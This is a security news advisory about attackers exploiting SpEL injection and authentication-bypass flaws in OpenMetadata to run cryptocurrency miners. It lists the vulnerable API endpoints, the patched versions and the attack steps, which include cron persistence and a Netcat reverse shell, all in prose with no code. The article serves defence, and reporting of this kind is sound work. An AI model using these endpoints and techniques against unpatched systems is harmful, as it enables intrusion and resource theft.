OpenMetadata platform flaws exploited to mine cryptocurrency
Take action: If you are using OpenMetadata in your infrastructure, the time to delay patching has passed. Lock down the system from the internet and patch ASAP. Because it will cost you dearly in cloud costs if a hacker places crypto mining tools, not to mention taking control of the servers.
Learn More
OpenMetadata metadata management platform, is under attack that exploits several vulnerabilities reported at the end of March 2024. These security issues have been used primarily to gain unauthorized access to Kubernetes workloads and facilitate cryptocurrency mining activities.
The vulnerabilities, identified and disclosed by security researcher Alvaro Muñoz, include:
- CVE-2024-28847 (CVSS score: 8.8): A Spring Expression Language (SpEL) injection vulnerability within the PUT /api/v1/events/subscriptions endpoint. It was patched in version 1.2.4.
- CVE-2024-28848 (CVSS score: 8.8): A similar SpEL injection vulnerability in the GET /api/v1/policies/validation/condition/<expr> endpoint, also fixed in version 1.2.4.
- CVE-2024-28253 (CVSS score: 8.8): Another SpEL injection vulnerability in the PUT /api/v1/policies endpoint, which was resolved in version 1.3.1.
- CVE-2024-28254 (CVSS score: 8.8): A SpEL injection vulnerability within the GET /api/v1/events/subscriptions/validation/condition/<expr> endpoint, fixed in version 1.2.4.
- CVE-2024-28255 (CVSS score: 9.8): An authentication bypass vulnerability that was addressed in version 1.2.4.
These vulnerabilities are reported by Microsoft Threat Intelligence team as being weaponized by attackers to bypass authentication, remote code execution, and deploying cryptocurrency mining malware. The threat actors exploited unpatched, internet-facing OpenMetadata installations, initially gaining code execution within the containers running the OpenMetadata image.
The attackers conducted extensive reconnaissance to assess the compromised environment, including network and hardware configurations, operating system details, and other critical data.
The ultimate aim of the attackers was to install crypto-mining malware, sourced from a server in China, suitable for either Windows or Linux systems. Post installation, initial payloads were deleted, and persistence was ensured through cron jobs. The attackers also established a reverse shell using Netcat, granting them further control over the system.
An interesting aspect of this cyber operation was the discovery of a personal note left by the attacker, claiming poverty and the necessity to raise funds for personal expenses, although still stating an aversion to illegal activities.
OpenMetadata users are urged to strengthen authentication methods, avoid default credentials, and ensure their systems are updated to the latest versions to mitigate such threats.
